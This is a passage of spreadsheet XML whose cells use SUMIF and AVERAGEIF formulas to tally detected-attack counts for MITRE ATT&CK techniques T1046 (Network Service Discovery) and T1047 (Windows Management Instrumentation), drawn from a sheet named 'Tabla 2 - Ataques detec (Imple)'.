        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA14" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (7)</v>
      </c>
      <c r="AB14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC14" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>25</v>
      </c>
      <c r="AF14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>11</v>
      </c>
      <c r="AG14" s="322" t="str">
        <f t="shared" si="4"/>
        <v>11 (25)</v>
      </c>
      <c r="AH14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>10</v>
      </c>
      <c r="AI14" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>32</v>
      </c>
      <c r="AL14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>14</v>
      </c>
      <c r="AM14" s="322" t="str">
        <f t="shared" si="5"/>
        <v>14 (32)</v>
      </c>
      <c r="AN14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>12</v>
      </c>
      <c r="AO14" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ14" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR14" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS14" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT14" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY14" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ14" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA14" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC14" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>8</v>
      </c>
      <c r="BD14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>4</v>
      </c>
      <c r="BE14" s="4" t="str">
        <f t="shared" si="8"/>
        <v>4 (8)</v>
      </c>
      <c r="BF14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI14" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ14" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK14" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL14" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO14" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ14" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV14" s="292">
        <v>0</v>
      </c>
      <c r="BW14" s="322">
        <v>0</v>
      </c>
      <c r="BX14" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY14" s="12">
        <v>0</v>
      </c>
      <c r="BZ14" s="13">
        <v>0</v>
      </c>
      <c r="CA14" s="394">
        <v>0</v>
      </c>
      <c r="CB14" s="288">
        <v>0</v>
      </c>
      <c r="CC14" s="4">
        <v>0</v>
      </c>
      <c r="CD14" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE14" s="4">
        <v>0</v>
      </c>
      <c r="CF14" s="4">
        <v>0</v>
      </c>
      <c r="CG14" s="13">
        <v>0</v>
      </c>
      <c r="CH14" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="4">
        <f t="shared" si="13"/>
        <v>13</v>
      </c>
      <c r="B15" s="4" t="str">
        <f>IFERROR(VLOOKUP(A15,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1046</v>
      </c>
      <c r="C15" s="493" t="str">
        <f>IFERROR(VLOOKUP(B15,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Service Discovery</v>
      </c>
      <c r="D15" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B15)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E15" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>65846</v>
      </c>
      <c r="F15" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (65846)</v>
      </c>
      <c r="G15" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>276</v>
      </c>
      <c r="H15" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>107</v>
      </c>
      <c r="I15" s="322" t="str">
        <f t="shared" si="0"/>
        <v>107 (276)</v>
      </c>
      <c r="J15" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>13</v>
      </c>
      <c r="K15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="L15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>87</v>
      </c>
      <c r="M15" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>858</v>
      </c>
      <c r="N15" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>305</v>
      </c>
      <c r="O15" s="322" t="str">
        <f t="shared" si="1"/>
        <v>305 (858)</v>
      </c>
      <c r="P15" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>123</v>
      </c>
      <c r="Q15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>116</v>
      </c>
      <c r="S15" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1134</v>
      </c>
      <c r="T15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>412</v>
      </c>
      <c r="U15" s="4" t="str">
        <f t="shared" si="2"/>
        <v>412 (1134)</v>
      </c>
      <c r="V15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>136</v>
      </c>
      <c r="W15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>136</v>
      </c>
      <c r="Y15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>15728</v>
      </c>
      <c r="Z15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1260</v>
      </c>
      <c r="AA15" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1260 (15728)</v>
      </c>
      <c r="AB15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>136</v>
      </c>
      <c r="AC15" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>170</v>
      </c>
      <c r="AE15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4184</v>
      </c>
      <c r="AF15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>822</v>
      </c>
      <c r="AG15" s="322" t="str">
        <f t="shared" si="4"/>
        <v>822 (4184)</v>
      </c>
      <c r="AH15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>341</v>
      </c>
      <c r="AI15" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>142</v>
      </c>
      <c r="AK15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>19912</v>
      </c>
      <c r="AL15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>2082</v>
      </c>
      <c r="AM15" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2082 (19912)</v>
      </c>
      <c r="AN15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>793</v>
      </c>
      <c r="AO15" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>178</v>
      </c>
      <c r="AQ15" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR15" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS15" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT15" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1815</v>
      </c>
      <c r="AX15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>629</v>
      </c>
      <c r="AY15" s="322" t="str">
        <f t="shared" si="7"/>
        <v>629 (1815)</v>
      </c>
      <c r="AZ15" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>346</v>
      </c>
      <c r="BA15" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BB15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>128</v>
      </c>
      <c r="BC15" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2949</v>
      </c>
      <c r="BD15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1041</v>
      </c>
      <c r="BE15" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1041 (2949)</v>
      </c>
      <c r="BF15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>482</v>
      </c>
      <c r="BG15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>152</v>
      </c>
      <c r="BI15" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>702</v>
      </c>
      <c r="BJ15" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>468</v>
      </c>
      <c r="BK15" s="322" t="str">
        <f t="shared" si="9"/>
        <v>468 (702)</v>
      </c>
      <c r="BL15" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>110</v>
      </c>
      <c r="BM15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>171</v>
      </c>
      <c r="BO15" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>881</v>
      </c>
      <c r="BP15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>647</v>
      </c>
      <c r="BQ15" s="4" t="str">
        <f t="shared" si="10"/>
        <v>647 (881)</v>
      </c>
      <c r="BR15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>110</v>
      </c>
      <c r="BS15" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>11</v>
      </c>
      <c r="BT15" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU15" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>186</v>
      </c>
      <c r="BV15" s="292">
        <v>5560</v>
      </c>
      <c r="BW15" s="322">
        <v>252</v>
      </c>
      <c r="BX15" s="4" t="str">
        <f t="shared" si="11"/>
        <v>252 (5560)</v>
      </c>
      <c r="BY15" s="12">
        <v>51</v>
      </c>
      <c r="BZ15" s="13">
        <v>1</v>
      </c>
      <c r="CA15" s="394">
        <v>168</v>
      </c>
      <c r="CB15" s="288">
        <v>11120</v>
      </c>
      <c r="CC15" s="4">
        <v>421</v>
      </c>
      <c r="CD15" s="4" t="str">
        <f t="shared" si="12"/>
        <v>421 (11120)</v>
      </c>
      <c r="CE15" s="4">
        <v>51</v>
      </c>
      <c r="CF15" s="4">
        <v>6</v>
      </c>
      <c r="CG15" s="13">
        <v>1</v>
      </c>
      <c r="CH15" s="394">
        <v>168</v>
      </c>
    </row>
    <row r="16" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="4">
        <f t="shared" si="13"/>
        <v>14</v>
      </c>
      <c r="B16" s="4" t="str">
        <f>IFERROR(VLOOKUP(A16,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1047</v>
      </c>
      <c r="C16" s="493" t="str">
        <f>IFERROR(VLOOKUP(B16,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="D16" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B16)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E16" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>912</v>
      </c>
      <c r="F16" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (912)</v>
      </c>
      <c r="G16" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>13</v>
      </c>
      <c r="H16" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5</v>
      </c>
      <c r="I16" s="322" t="str">
        <f t="shared" si="0"/>
        <v>5 (13)</v>
      </c>
      <c r="J16" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>3</v>
      </c>
      <c r="M16" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>1369</v>
      </c>
      <c r="N16" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1322</v>
      </c>
      <c r="O16" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1322 (1369)</v>
      </c>
      <c r="P16" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>6</v>
      </c>
      <c r="Q16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>878</v>
      </c>
      <c r="S16" s="409">
